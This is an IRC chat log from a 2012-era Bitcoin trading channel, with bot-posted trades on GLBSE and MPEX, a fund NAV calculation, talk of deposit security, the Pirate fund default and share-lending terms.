[Bid: 0.0002] [Ask: 1.4] [Spread: 1.3998] [Last: 1.4] [24hVol: ] [7dAvg: 1.382] Aug 26 21:44:14 ahahah Aug 26 21:44:27 .py 1.4 / 1.3998 Aug 26 21:44:28 1.00014287755 Aug 26 21:44:37 ugh i mwean Aug 26 21:44:41 .py 1.3998 / 1.4 Aug 26 21:44:42 0.999857142857 Aug 26 21:44:42 how do I compute the NAV of mpoe.etf? Aug 26 21:45:06 0,9998! dude, that's got to be a record for btc and implicitly everything Aug 26 21:45:10 bitfoo: the fund has about 4million shares and ~ 10 btc Aug 26 21:45:19 ok Aug 26 21:45:27 is it just updated on the forum thread? Aug 26 21:45:48 bitfoo: i give monthly 10-k style financial reports Aug 26 21:45:58 ok, I think I've seen those Aug 26 21:46:58 yeah, i do it for SS too Aug 26 21:47:09 [GLBSE] [NYAN.C] 5 @ 0.7 = 3.5 BTC [-] Aug 26 21:48:07 howdy ladies Aug 26 21:48:24 kakobrekla: is that you ask on mpoe.etf @ 20 btc? Aug 26 21:48:25 hi missy. Aug 26 21:48:33 huh? Aug 26 21:48:35 not me Aug 26 21:48:49 oh, that would have been humorous Aug 26 21:48:52 howdy kako Aug 26 21:48:58 whats the news Aug 26 21:49:06 how's smpake doing? Aug 26 21:49:20 well i dont know what to say really Aug 26 21:49:32 im staying up all night prolly to finish permanent links Aug 26 21:49:51 [GLBSE] [NYAN.C] 2 @ 0.7 = 1.4 BTC [-] Aug 26 21:49:53 then im bumping up the mininum Aug 26 21:49:58 and then Aug 26 21:50:05 i will see how noone will use it again :D Aug 26 21:50:09 kakobrekla: is it still just for gox? Aug 26 21:50:17 well at this point yeah Aug 26 21:50:29 i figured there would be most traffic to that exchange Aug 26 21:50:45 likely, yea Aug 26 21:50:50 what should be the next one Aug 26 21:50:52 glbse maybe' Aug 26 21:51:02 in nef gets api together. Aug 26 21:51:22 the website is the api Aug 26 21:51:31 hm Aug 26 21:51:44 [GLBSE] [OBSI.HRPT] 4 @ 0.1 = 0.4 BTC [-] Aug 26 21:52:03 glbse is easy to scrape/create form data Aug 26 21:52:07 id really like to avoid using 'api' throgh html code :D Aug 26 21:52:46 smpake -> mpex would be nice for when mircea_popescu isn't around Aug 26 21:52:49 I wouldn't recommend it Aug 26 21:53:08 smickles: deposits are manual for mpex? Aug 26 21:53:08 nefario can we has tranfer api Aug 26 21:53:13 bah Aug 26 21:53:15 transfer Aug 26 21:53:18 [GLBSE] [GIGAMINING] 2 @ 0.9738 = 1.9476 BTC [-] Aug 26 21:53:19 nefario: yeah Aug 26 21:53:27 which i was meaning to ask about Aug 26 21:53:40 mircea_popescu: how come deposits are manual? Aug 26 21:53:53 also 'smpake' should prolly get a better name after going out of beta, suggestions accepted :) Aug 26 21:53:55 are withdrawals also? Aug 26 21:54:03 smickles cause i'm paranoid. Aug 26 21:54:09 i understand why for withdrawals, but deposits, eludes me Aug 26 21:54:09 kakobrekla: smpake sounds like bukakke Aug 26 21:54:14 thanks! Aug 26 21:54:15 :D Aug 26 21:54:24 why does anyone use mpex? Aug 26 21:54:24 i don't run bitcoin-d. Aug 26 21:54:31 nefario, stop trolling :D Aug 26 21:54:37 no really Aug 26 21:54:41 nefario cause they're paranoid too. Aug 26 21:54:42 I'm baffled Aug 26 21:54:42 oh Aug 26 21:54:48 >20 BTC sign up Aug 26 21:54:52 mircea_popescu: couldn't you just monitor the address w/o the private key? Aug 26 21:54:52 It is a good question Aug 26 21:55:02 smickles monitor, what's that mean ? Aug 26 21:55:06 GLBSE 1.0 had a command line client and key based auth etc. Aug 26 21:55:06 [GLBSE] [HYDRO.BONDS] 1 @ 1.57 BTC [-] Aug 26 21:55:11 few people used it Aug 26 21:55:27 mircea_popescu: watch Aug 26 21:55:30 I use it because of the stocks on offer there Aug 26 21:55:44 smickles so what do i achieve by watching it ? Aug 26 21:56:12 sure, now they all have pass-throughs, but they didn't before Aug 26 21:56:13 mircea_popescu: like, automate deposits by watching the deposit address for 6 confirms on deposit transactions Aug 26 21:56:17 [GLBSE] [NYAN.C] 7 @ 0.69 = 4.83 BTC [-] Aug 26 21:56:37 what did they have before? Aug 26 21:56:39 smickles seems insecure. Aug 26 21:56:47 I didn't hear of mpex before march Aug 26 21:56:48 mircea_popescu, BVPS, MPOE, options Aug 26 21:57:10 mircea_popescu: what's the risk? someone nefariously gives you btc? Aug 26 21:57:28 lol nefariously Aug 26 21:57:29 if you can programatically interract with the wallet you can programatically inerract with the wallet. Aug 26 21:57:36 im not inclined to write a special btc client yet. Aug 26 21:57:48 one that can only read Aug 26 21:57:48 mircea_popescu, you don't need access to the wallet to watch an address for incoming tx Aug 26 21:58:02 bitfoo what'd i watch ? Aug 26 21:58:28 the data is public Aug 26 21:58:34 blockchain.info if you don't want to listen to incoming transactions Aug 26 21:58:35 I don't need the private key to know when something is sent Aug 26 21:58:37 [GLBSE] [JAH] 16 @ 0.16 = 2.56 BTC [-] Aug 26 21:59:03 well you don't, no, i'm not saying it couldn't be done. Aug 26 21:59:05 by any means. Aug 26 21:59:07 you could use a client with seperate and unused wallet data Aug 26 21:59:27 smickles and someone crashes it and etc. Aug 26 21:59:45 it's just... secure software is a big, complex and thorny topic, you know ? Aug 26 22:00:47 i.e. hard Aug 26 22:00:53 i know, Aug 26 22:00:55 i.e. hard. Aug 26 22:00:55 [GLBSE] [OBSI.HRPT] 2 @ 0.1 = 0.2 BTC [-] Aug 26 22:01:05 in the case of failure, you can rollover to manual Aug 26 22:01:31 so to make a long answer short, for the time being the costs of resolving this problem don't seem justified. even with the ipo or w/e it wasn't my deposit system that ever was the bottleneck Aug 26 22:02:13 [MPEX] [F.GIGA.ETF] 12254 @ 0.00103158 = 12.641 BTC [+] Aug 26 22:02:36 how much did you raise for your IPO? Aug 26 22:02:53 !tickers.dice Aug 26 22:02:56 !ticker s.dice Aug 26 22:02:57 [MPEX:S.DICE] 1day: 0.0032 / 0.00332403 / 0.0034 (425860 shares, 1,415.57 BTC), 30day: 0.0032 / 0.00322445 / 0.0034 (2295100 shares, 7,400.44 BTC) Aug 26 22:03:06 7.4k Aug 26 22:03:13 BTC? Aug 26 22:03:28 yup Aug 26 22:03:36 so far Aug 26 22:03:37 for how much equity? Aug 26 22:04:12 2.2mil out of 10 mill, the 10 mil being 10% Aug 26 22:05:04 so 2% Aug 26 22:05:16 seems so Aug 26 22:06:20 [GLBSE] [TYGRR.BOND-P] 1 @ 0.41 BTC [-] Aug 26 22:06:55 [GLBSE] [TYGRR.BOND-P] 1 @ 0.4 BTC [-] Aug 26 22:07:07 and no more than 10 mil will be issued within 30 days, and no more than 50 mil of the 100 mil ever issued to the public Aug 26 22:07:26 [GLBSE] [YABMC] 11 @ 0.1341 = 1.4751 BTC [+] Aug 26 22:07:27 [GLBSE] [FOO.PPPPT] 3 @ 0.4 = 1.2 BTC [+] Aug 26 22:07:48 im curious if the guy ever manages to sell out to that macau casino Aug 26 22:07:53 buy more GSDPT :P Aug 26 22:07:53 I have already fixed the backing :) Aug 26 22:08:02 because srsly... $.$ Aug 26 22:08:40 [GLBSE] [TYGRR.BOND-P] 1 @ 0.39 BTC [-] Aug 26 22:08:40 [GLBSE] [TYGRR.BOND-P] 1 @ 0.39 BTC [-] Aug 26 22:08:43 I hate my internet right now Aug 26 22:09:01 [GLBSE] [BIB.PIRATE] 10 @ 0.339 = 3.39 BTC [+] Aug 26 22:10:06 [GLBSE] [TYGRR.BOND-P] 1 @ 0.38 BTC [-] Aug 26 22:10:25 [GLBSE] [JAH] 25 @ 0.16 = 4 BTC [-] Aug 26 22:11:17 [GLBSE] [TYGRR.BOND-P] 1 @ 0.37 BTC [-] Aug 26 22:11:50 [MPEX] [S.MPOE] 3700 @ 0.00037975 = 1.4051 BTC [+] Aug 26 22:11:52 [MPEX] [S.MPOE] 19912 @ 0.0003807 = 7.5805 BTC [+] Aug 26 22:11:53 [MPEX] [S.MPOE] 10186 @ 0.00038075 = 3.8783 BTC [+] Aug 26 22:11:54 [MPEX] [S.MPOE] 8200 @ 0.00038167 = 3.1297 BTC [+] Aug 26 22:11:55 [MPEX] [S.MPOE] 14900 @ 0.00038413 = 5.7235 BTC [+] Aug 26 22:11:57 [MPEX] [S.MPOE] 37300 @ 0.00038495 = 14.3586 BTC [+] Aug 26 22:11:58 [MPEX] [S.MPOE] 3108 @ 0.00038531 = 1.1975 BTC [+] Aug 26 22:11:59 [MPEX] [S.MPOE] 45558 @ 0.00038582 = 17.5772 BTC [+] Aug 26 22:11:59 [MPEX] [S.MPOE] 53018 @ 0.00038598 = 20.4639 BTC [+] Aug 26 22:12:00 [MPEX] [S.MPOE] 24967 @ 0.00038726 = 9.6687 BTC [+] Aug 26 22:12:01 [MPEX] [S.MPOE] 52300 @ 0.00038865 = 20.3264 BTC [+] Aug 26 22:12:02 [MPEX] [S.MPOE] 8100 @ 0.00038926 = 3.153 BTC [+] Aug 26 22:12:03 [MPEX] [S.MPOE] 49300 @ 0.00038976 = 19.2152 BTC [+] Aug 26 22:12:05 [MPEX] [S.MPOE] 4900 @ 0.00038983 = 1.9102 BTC [+] Aug 26 22:12:06 [MPEX] [S.MPOE] 58100 @ 0.00039138 = 22.7392 BTC [+] Aug 26 22:12:07 [MPEX] [S.MPOE] 30471 @ 0.00039293 = 11.973 BTC [+] Aug 26 22:12:08 [MPEX] [S.MPOE] 37400 @ 0.00039344 = 14.7147 BTC [+] Aug 26 22:12:08 [MPEX] [S.MPOE] 40227 @ 0.00039431 = 15.8619 BTC [+] Aug 26 22:12:09 [MPEX] [S.MPOE] 26215 @ 0.00039587 = 10.3777 BTC [+] Aug 26 22:12:10 [MPEX] [S.MPOE] 13500 @ 0.00039656 = 5.3536 BTC [+] Aug 26 22:12:11 [MPEX] [S.MPOE] 50300 @ 0.00039721 = 19.9797 BTC [+] Aug 26 22:12:12 [MPEX] [S.MPOE] 8317 @ 0.00039745 = 3.3056 BTC [+] Aug 26 22:12:13 [MPEX] [S.MPOE] 19400 @ 0.00039793 = 7.7198 BTC [+] Aug 26 22:12:14 [MPEX] [S.MPOE] 41848 @ 0.00039989 = 16.7346 BTC [+] Aug 26 22:12:15 [MPEX] [S.MPOE] 63773 @ 0.0004 = 25.5092 BTC [+] Aug 26 22:12:17 [GLBSE] [TYGRR.BOND-P] 1 @ 0.36 BTC [-] Aug 26 22:12:18 woah still has steam Aug 26 22:12:31 aaa yeah baby. Aug 26 22:12:40 What's S.MPOE? Aug 26 22:12:43 [GLBSE] [TYGRR.BOND-P] 1 @ 0.35 BTC [-] Aug 26 22:12:53 yest Diablo-D3 found out in amazement mpex is mine Aug 26 22:13:02 today atlas finds out s.mpoe is the mpex/mpoe conglomerate Aug 26 22:13:03 EmanuelDeOrtego: it's mpex shares, essentially Aug 26 22:13:04 s.dice did some magick on s.mpoe e Aug 26 22:13:04 lol! Aug 26 22:13:06 each day a wonder Aug 26 22:13:42 Dude, I love your beard Aug 26 22:13:45 It is so classy Aug 26 22:13:47 EmanuelDeOrtego ty. Aug 26 22:13:51 lol Aug 26 22:13:55 (which beard we talkin of ?) Aug 26 22:14:02 http://polimedia.us/bitcoin/mpoe-me.jpg Aug 26 22:14:04 I want to go to Vlads BBQ :( Aug 26 22:14:13 a hehe. Aug 26 22:14:14 vlads bbq? Aug 26 22:14:18 but I can't as I am only staying until Sunday evening then I am leaving again. Aug 26 22:14:37 Vlad is throwing a BBQ in connection to the conference but it's on the 19th or something like that Aug 26 22:14:44 where Aug 26 22:14:59 at his house :P He posted about it on the forums today Aug 26 22:15:04 invite only/you have to ask Aug 26 22:15:06 ah UK Aug 26 22:17:00 EmanuelDeOrtego there, hack my website : http://trilema.com/wp-content/themes/trilema/images/ Aug 26 22:17:11 all the stuff that starts with bg_ are backgrounds used during the years Aug 26 22:17:15 i change them quarterly. Aug 26 22:17:39 lol'd http://trilema.com/wp-content/themes/trilema/images/bg_werexpearts.jpg Aug 26 22:17:45 Nice 80s collar Aug 26 22:18:04 that was in i think san antonio Aug 26 22:18:44 You're right : O Aug 26 22:18:53 yah. great town. Aug 26 22:18:54 I remember that bench actually Aug 26 22:19:08 buncha bartender chicks kept buying me drinks. Aug 26 22:19:29 lol Aug 26 22:19:45 dat 80s collar + my yurpean accent => win. Aug 26 22:20:24 ha, you look like young December from Fringe or smth here http://trilema.com/wp-content/themes/trilema/images/bg_iul2011.jpg Aug 26 22:20:51 that's in barrio pinto, san jose, cr. Aug 26 22:20:52 <_locust_> gipsies gotta gip... Aug 26 22:21:05 lol dun hate on cr. Aug 26 22:23:15 [GLBSE] [OBSI.HRPT] 2 @ 0.1 = 0.2 BTC [-] Aug 26 22:25:11 http://trilema.com/wp-content/themes/trilema/images/bg_jul2010.jpg as you can see i was making rigs back in the summer of 2010 Aug 26 22:25:21 everyone else is just a copycat. Aug 26 22:25:58 I remember when I could get hundreds of Bitcoins on a Pentium 3 Aug 26 22:26:37 No, it was early 2010 possibly 2009 Aug 26 22:27:14 Yeah, it was in 2009 Aug 26 22:27:23 http://trilema.com/wp-content/themes/trilema/images/bg_oct2010.jpg ne1 know where this is btw ? Aug 26 22:27:25 If you were early, hardware didn't mean squat Aug 26 22:27:41 Nope. Aug 26 22:28:00 ehehe Aug 26 22:28:14 anyone, and i do mean, anyone who's into finance must know that building. Aug 26 22:28:17 there is only one. Aug 26 22:28:42 Merryl Lynch Aug 26 22:28:50 Headquarters Aug 26 22:28:51 IDK Aug 26 22:28:59 [GLBSE] [FPGAMINING] 1 @ 0.93 BTC [+] Aug 26 22:29:16 nah Aug 26 22:29:42 lol'd, the sign is still up at the top Aug 26 22:29:43 http://en.wikipedia.org/wiki/Bitcoin Aug 26 22:29:51 mp frankfurt? Aug 26 22:29:56 kakobrekla indeed :) Aug 26 22:30:01 the german stox exchange. Aug 26 22:30:13 ;> Aug 26 22:31:55 I think Satoshi DICE is the first real profitable IPO that isn't mining Aug 26 22:32:06 I am not even going to mention Pirate Aug 26 22:32:20 i am of the same persuasion. Aug 26 22:33:15 I think Pirate is going to do a MyBitcoin because he doesn't have the Bitcoins. Aug 26 22:33:23 The market won't cooperate with him. Aug 26 22:33:27 He's just boned. Aug 26 22:34:01 Assuming he planned to buy back bitcoins to start with Aug 26 22:35:05 i think what we saw in that plubnge was him dumping whateverr he had left Aug 26 22:35:17 of the fool's money *(they still call themselves investors lawl) Aug 26 22:37:24 waaaiit... just noticed it was impossible to have a small letter L in bitcoin adresses... Aug 26 22:37:41 and a capital I, right? Aug 26 22:37:52 aye Aug 26 22:40:09 So anyone has some nice deals on some stocks? Aug 26 22:40:22 If you want to get out, I can provide volume Aug 26 22:40:50 how's that been coming along ? Aug 26 22:42:21 BTC-Mining: as the bid depth on mpoe.etf has yet to fill in, what would youbuy at? Aug 26 22:43:32 smickles what you should do sometime btw Aug 26 22:43:38 is publish underlying factor Aug 26 22:43:53 as in, s.mpoe * Y = nav Aug 26 22:43:59 all the data are in thoes reports Aug 26 22:44:41 yes Aug 26 22:44:41 Eh, luckily, I lost nothing in the pirate default... Aug 26 22:44:51 but it'd simplify things for ppl Aug 26 22:44:52 it should be a financial manager of some kind who calculates the fundamentals from that data Aug 26 22:45:10 someone should already have filed a police report or something... Aug 26 22:45:31 or contact any appropriate agency about fraud Aug 26 22:45:32 BTC-Mining saying what ? guy renegged on his promise to give me 7% more monopoly money ? Aug 26 22:45:48 Got in, took some profit got out Aug 26 22:45:56 BTC-Mining: i only stand to lose indirectly from the pirate issue Aug 26 22:46:00 Whoever put their life savings into Pirate Aug 26 22:46:05 is going to regret it Aug 26 22:46:08 there were a coupla ppl. Aug 26 22:46:35 BTC is not monopoly money, and even if it were, theft is theft. If it's your monopoly money... Aug 26 22:46:59 i have 2.8 billion in monoply money in a suitcase Aug 26 22:47:19 But the market rate for this money is much higher than monopoly money at around 10 USD each... Aug 26 22:47:20 [GLBSE] [PPT.DIV] 4 @ 0.2979 = 1.1916 BTC [+] Aug 26 22:47:27 oh god Aug 26 22:47:33 those PPT.DIVs have no value Aug 26 22:47:35 zero Aug 26 22:47:37 [GLBSE] [BMMO] 9 @ 0.095 = 0.855 BTC [-] Aug 26 22:47:39 [GLBSE] [BMMO] 1 @ 0.095 BTC [-] Aug 26 22:47:53 [GLBSE] [PPT.DIV] 6 @ 0.298 = 1.788 BTC [+] Aug 26 22:49:10 It's like saying authorities would not do anything about someone stealing your cents, under the fact they have pretty much no official face value, when it's a coin collection and those cents actually predates 1900 or contain a few rare specimens. Aug 26 22:49:28 BTC-Mining simmer down man! i was just pointing out da police isn't equipped to deal with these things Aug 26 22:49:37 [MPEX] [S.MPOE] 43300 @ 0.00038105 = 16.4995 BTC [-] Aug 26 22:49:42 [GLBSE] [FPGAMINING] 20 @ 0.93 = 18.6 BTC [+] Aug 26 22:49:56 Maybe not to retrieve the funds Aug 26 22:50:07 I should put private keys on monopoly money for the lulz Aug 26 22:50:07 no, just to understand wtf you're on about. Aug 26 22:50:07 but to prevent pirate from exiting the US, yes. Aug 26 22:50:19 is all i meant. imagine guy in preicinct going... Aug 26 22:50:20 umm... Aug 26 22:50:22 wut ? Aug 26 22:50:27 He's probably already gone in any case. Aug 26 22:50:46 There's plenty of online currencies already... Aug 26 22:50:54 [GLBSE] [CBGB] 1 @ 0.5 BTC [+] Aug 26 22:51:15 maybe im just imagining things. Aug 26 22:51:16 You don't have to explain the details, just that someone absconded with your online funds. Aug 26 22:51:30 [MPEX] [S.MPOE] 26500 @ 0.00037925 = 10.0501 BTC [-] Aug 26 22:51:32 but i suiddenly had this very confused police officer in my head Aug 26 22:54:54 my mouse has quit Aug 26 22:55:16 [MPEX] [S.MPOE] 7900 @ 0.0003795 = 2.9981 BTC [+] Aug 26 22:55:17 [MPEX] [S.MPOE] 27763 @ 0.00038316 = 10.6377 BTC [+] Aug 26 22:55:18 [MPEX] [S.MPOE] 51100 @ 0.0003855 = 19.6991 BTC [+] Aug 26 22:55:19 [MPEX] [S.MPOE] 23100 @ 0.00038783 = 8.9589 BTC [+] Aug 26 22:55:20 [MPEX] [S.MPOE] 40137 @ 0.0004 = 16.0548 BTC [+] Aug 26 22:55:36 (By that, he means it had dust in it and wouldn't work properly, so he "quited" it through the window) Aug 26 22:56:05 don't you know it Aug 26 22:56:43 i had to get a pubic hair out of mine recently. Aug 26 22:56:49 wasn;t even my pubic hair :( Aug 26 22:57:10 this one is almost 15 years old Aug 26 22:57:13 ......... Aug 26 22:57:26 it's a wilerless keyboard/mouse from logitec Aug 26 22:57:43 and the wireless signal stopped coming out of the mouse Aug 26 22:57:56 BTC-Mining yeeees ? :D Aug 26 22:58:50 You shouldn't lend your things to people who can manage to do that Aug 26 22:59:48 well i never lent it. Aug 26 23:00:03 she linted it :D Aug 26 23:00:07 ahahahaah that's hysterical Aug 26 23:02:44 [GLBSE] [FDBF] 10 @ 0.15 = 1.5 BTC [+] Aug 26 23:03:32 [GLBSE] [BIB.PIRATE] 1 @ 0.339 BTC [+] Aug 26 23:04:01 [GLBSE] [YARR] 2 @ 0.941 = 1.882 BTC [-] Aug 26 23:06:25 [GLBSE] [FPGAMINING] 10 @ 0.93 = 9.3 BTC [+] Aug 26 23:11:37 [03:13:02] today atlas finds out s.mpoe is the mpex/mpoe conglomerate Aug 26 23:11:59 mp oversomething enterprises Aug 26 23:12:17 lol, mp options emporium Aug 26 23:12:31 should be oversomething :< Aug 26 23:12:53 overlord... no... overground... no... overwatch... maybe.... Aug 26 23:19:16 [GLBSE] [BITBOND] 2 @ 0.444 = 0.888 BTC [+] Aug 26 23:20:59 [MPEX] [O.BTCUSD.P090N] 5 @ 0.13220976 = 0.661 BTC [-] Aug 26 23:24:50 [GLBSE] [BITBOND] 6 @ 0.4381 = 2.6286 BTC [-] Aug 26 23:27:08 Is anyone lending GSTP? Aug 26 23:28:50 [GLBSE] [FPGAMINING] 46 @ 0.93 = 42.78 BTC [+] Aug 26 23:30:14 AgentKen: maybe we could arrange something Aug 26 23:30:29 what terms would you be interested in? Aug 26 23:31:37 [GLBSE] [BITBOND] 4 @ 0.4099 = 1.6396 BTC [-] Aug 26 23:35:19 smickles: How long are willing to lend and what's your interest rate? Aug 26 23:36:17 are you* Aug 26 23:40:41 overblown Aug 26 23:41:29 off hand, i'd say we take it one week at a time and charge 1% per week Aug 26 23:43:25 I didn't hear of mpex before march << you couldn't have, it launched in april. Aug 26 23:43:33 EmanuelDeOrtego: but iam willing to negociate terms Aug 26 23:44:15 smickles: Well, let me run some numbers. How many shares are up for lending? Aug 26 23:44:39 this kid's gonna end up rich. Aug 26 23:44:54 !ticker GSTP Aug 26 23:44:56 Invalid ticker. Aug 26 23:45:07 gsdpt, iirc Aug 26 23:45:24 o o the sdice pt ? Aug 26 23:45:49 I am not going long-term short. : P Aug 26 23:46:02 I only seek opportunities. Aug 26 23:46:06 EmanuelDeOrtego: somewhere around 2k currently Aug 26 23:46:29 smickles: Heh, I am sorry, my friend. I was hoping for around 20k at least. Aug 26 23:46:36 I already have 8k. : P Aug 26 23:47:01 EmanuelDeOrtego go on mpex and apply for margin eh. Aug 26 23:47:21 heh, too bad, i'm not in a position to ffer that quite yet Aug 26 23:47:53 mircea_popescu: I would if I was sure I could recoup that 20 BTC investment. Aug 26 23:48:00 When I am sure Aug 26 23:48:01 I will Aug 26 23:48:32 well, it's an investment in your future. if you had already months ago now borrfowing shares would be trivial wouldn't it. Aug 26 23:48:37 who knows what happens next. Aug 26 23:49:32 Mircea_popescu: You won't be charging 20+ BTC fees when a Bitcoin is over $100. : P Aug 26 23:49:39 and what if i will ? Aug 26 23:49:54 Hmmm Aug 26 23:49:55 go get a pit spot on nyse, see how much that runs you. Aug 26 23:50:08 I will consider this. Aug 26 23:51:25 [GLBSE] [GSDPT] 2900 @ 0.0034 = 9.86 BTC [+] Aug 26 23:51:38 [GLBSE] [V.HRL] 10 @ 1 = 10 BTC Aug 26 23:53:22 [GLBSE] [GSDPT] 10 @ 0.0034 = 0.034 BTC [+] Aug 26 23:53:37 [GLBSE] [GSDPT] 10 @ 0.0034 = 0.034 BTC [+] Aug 26 23:54:53 [GLBSE] [GSDPT] 2 @ 0.0034 = 0.0068 BTC [+] Aug 26 23:55:09 [GLBSE] [GSDPT] 2 @ 0.0034 = 0.0068 BTC [+] Aug 26 23:55:25 [GLBSE] [GSDPT] 2 @ 0.0034 = 0.0068 BTC [+] Aug 26 23:55:36 ahhh, that sweet day when i go ;;ticker and gribble prints three digits before the dot... Aug 26 23:56:08 0_0 that will be a day when Bitcoin is near extinction Aug 26 23:56:11 i bet that will be caused by mtg bug at least once before the real deal Aug 26 23:56:37 oh Aug 26 23:56:45 nvm confused tickers for a moment Aug 26 23:56:58 I thought you were talking about share prices Aug 26 23:57:21 [GLBSE] [FPGAMINING] 4 @ 0.9499 = 3.7996 BTC [+] Aug 26 23:57:31 kakobrekla lol you might well be rifght Aug 26 23:57:50 Mt. Gox needs some serious help Aug 26 23:57:54 It should IPO Aug 26 23:57:59 they seem to be doing ok lately, no ? Aug 26 23:58:30 nah, they can't ipo. the forum would never approve. Aug 26 23:58:32 Except when somebody purchases more 10,000 Bitcoins Aug 26 23:58:39 than* Aug 26 23:58:55 [GLBSE] [OBSI.HRPT] 59 @ 0.103 = 6.077 BTC [+] Aug 26 23:59:11 how you figure ? Aug 26 23:59:38 It either crashes or they have to manually approve the transaction... Aug 26 23:59:43 Then the rally loses all momentum Aug 26 23:59:49 and people still end up being bears Aug 27 00:00:11 did it crash recently ?! Aug 27 00:00:23 I am sure how that flash crash went down. Aug 27 00:00:28 not* Aug 27 00:00:43 [GLBSE] [FOO.PPPPT] 6 @ 0.4699 = 2.8194 BTC [+] Aug 27 00:00:45 [GLBSE] [FOO.PPPPT] 22 @ 0.47 = 10.34 BTC [+] Aug 27 00:00:46 o, you think it was them crashed ? Aug 27 00:00:54 truth is couldn't see mkt depth for about a day... Aug 27 00:02:28 [GLBSE] [FPGAMINING] 5 @ 0.86187 = 4.3094 BTC [-] Aug 27 00:02:29 [GLBSE] [FPGAMINING] 4 @ 0.86186 = 3.4474 BTC [-] Aug 27 00:02:30 [GLBSE] [FPGAMINING] 1 @ 0.861 BTC [-] Aug 27 00:02:31 [GLBSE] [FPGAMINING] 3 @ 0.853 = 2.559 BTC [-] Aug 27 00:02:32 [GLBSE] [FPGAMINING] 37 @ 0.852 = 31.524 BTC [-] Aug 27 00:02:50 !ticker FPGAMINING Aug 27 00:02:50 [GLBSE] [FOO.PPPPT] 16 @ 0.47 = 7.52 BTC [+] Aug 27 00:02:53 [GLBSE:FPGAMINING] [Bid: 0.852] [Ask: 0.9499] [Spread: 0.0979] [Last: 0.852] [24hVol: 363.8997599] [7dAvg: 0.90554816] Aug 27 00:03:09 !ticker ASICMINING Aug 27 00:03:12 Invalid ticker. Aug 27 00:03:15 !ticker ASICMINER Aug 27 00:03:17 [GLBSE:ASICMINER] [Bid: 0.085] [Ask: 0.086] [Spread: 0.001] [Last: 0.08967999] [24hVol: 80.70818761] [7dAvg: 0.09389722] Aug 27 00:03:26 why are all these crashing ? Aug 27 00:03:40 cause its just words? Aug 27 00:03:55 ASICMINER has nothing to show for it Aug 27 00:04:05 It's just betting on if BFL will ship out or not Aug 27 00:04:21 hm. Aug 27 00:04:29 i guess pirate put a chill on everything huh Aug 27 00:04:38 [GLBSE] [FOO.PPPPT] 31 @ 0.47 = 14.57 BTC [+] Aug 27 00:04:49 The sooner that whole Pirate fiasco finalizes the better Aug 27 00:04:55 yes. Aug 27 00:05:42 Amount of MPOE stock held The fund currently holds 4,073,980 shares of MPOE stock Aug 27 00:05:54 The number of issued, outstanding and authorized stock is 1110 shares. Aug 27 00:05:58 ok so Aug 27 00:06:05 .py 4,073,980 / 1110.0 Aug 27 00:06:05 [GLBSE] [FOO.PPPPT] 5 @ 0.48 = 2.4 BTC [+] Aug 27 00:06:05 (4, 59, 0.88288288288288286) Aug 27 00:06:16 .py 4073980 / 1110.0 Aug 27 00:06:16 3670.25225225 Aug 27 00:06:23 !ticker s.mpoe Aug 27 00:06:25 [MPEX:S.MPOE] 1day: 0.00037531 / 0.00038748 / 0.0004 (2424737 shares, 939.54 BTC), 30day: 0.000035 / 0.00036254 / 0.00041457 (71582191 shares, 25,951.60 BTC) Aug 27 00:06:35 .py 0.00038748 * 3670.25225225 Aug 27 00:06:35 1.4221493427 Aug 27 00:06:50 a no wonder ppl aren't selling then. Aug 27 00:07:16 [GLBSE] [ASICMINER] 230 @ 0.086 = 19.78 BTC [-] Aug 27 00:07:28 [GLBSE] [TYGRR.BOND-P] 1 @ 0.46 BTC [+] Aug 27 00:07:29 [GLBSE] [TYGRR.BOND-P] 1 @ 0.47 BTC [+] Aug 27 00:07:30 [GLBSE] [TYGRR.BOND-P] 1 @ 0.48 BTC [+] Aug 27 00:07:31 [GLBSE] [TYGRR.BOND-P] 1 @ 0.49 BTC [+] Aug 27 00:07:51 [GLBSE] [FOO.PPPPT] 1 @ 0.35 BTC [-] Aug 27 00:07:56 yeah, it's just a slow moving asset, and it has an easily calc'd value Aug 27 00:08:10 i doubt anyone will sell for that .1 Aug 27 00:08:27 oh, lol, someone out bid them Aug 27 00:08:34 there's a .10000001 Aug 27 00:08:43 great fortune. Aug 27 00:09:30 .py 7000/1110.0 Aug 27 00:09:31 6.30630630631 Aug 27 00:09:41 [GLBSE] [FOO.PPPPT] 3 @ 0.5 = 1.5 BTC [+] Aug 27 00:09:42 [GLBSE] [FOO.PPPPT] 4 @ 0.53 = 2.12 BTC [+] Aug 27 00:09:47 someone is bidding for about 6x the number of shares at .00011 Aug 27 00:10:10 it's cheap, why not Aug 27 00:10:18 [GLBSE] [BIB.PIRATE] 4 @ 0.4399 = 1.7596 BTC [+] Aug 27 00:13:29 [GLBSE] [TYGRR.BOND-A] 3 @ 0.152 = 0.456 BTC [+] Aug 27 00:15:08 [MPEX] [S.MPOE] 24900 @ 0.000384 = 9.5616 BTC [-] Aug 27 00:18:35 [MPEX] [S.MPOE] 22200 @ 0.00038373 = 8.5188 BTC [-] Aug 27 00:19:15 [MPEX] [S.BVPS] 20 @ 0.00342417 = 0.0685 BTC [-] Aug 27 00:19:16 [MPEX] [S.BVPS] 261 @ 0.00341492 = 0.8913 BTC [-] Aug 27 00:19:18 [MPEX] [S.BVPS] 219 @ 0.00341296 = 0.7474 BTC [-] Aug 27 00:21:15 [GLBSE] [BITCOINMINV] 1 @ 0.175 BTC [+] Aug 27 00:23:20 yay! my mouse started working again :D Aug 27 00:24:01 [MPEX] [S.MPOE] 14800 @ 0.00038311 = 5.67 BTC [-] Aug 27 00:24:02 i contest that it was just ut usaf jamming my mouse as a test Aug 27 00:24:31 [GLBSE] [NYAN.B] 7 @ 0.999 = 6.993 BTC [+] Aug 27 00:25:45 next time they'll sorbet it. Aug 27 00:26:55 [GLBSE] [PPT.B] 49 @ 0.5 = 24.5 BTC [-] Aug 27 00:27:36 [MPEX] [O.BTCUSD.P130T] 1 @ 0.23292418 BTC [-] Aug 27 00:28:41 [GLBSE] [PPT.E] 46 @ 0.5 = 23 BTC [-] Aug 27 00:29:50 [GLBSE] [PPT.A] 32 @ 0.5 = 16 BTC [-] Aug 27 00:36:55 [GLBSE] [FDBF] 10 @ 0.131 = 1.31 BTC [-] Aug 27 00:36:57 [GLBSE] [FDBF] 1 @ 0.13 BTC [-] Aug 27 00:39:21 [GLBSE] [FPGAMINING] 4 @ 0.9449 = 3.7796 BTC [+] Aug 27 00:39:23 [GLBSE] [FPGAMINING] 67 @ 0.945 = 63.315 BTC [+] Aug 27 00:39:24 [GLBSE] [FPGAMINING] 5 @ 0.9498 = 4.749 BTC [+] Aug 27 00:39:26 [GLBSE] [FPGAMINING] 15 @ 0.9499 = 14.2485 BTC [+] Aug 27 00:39:27 [GLBSE] 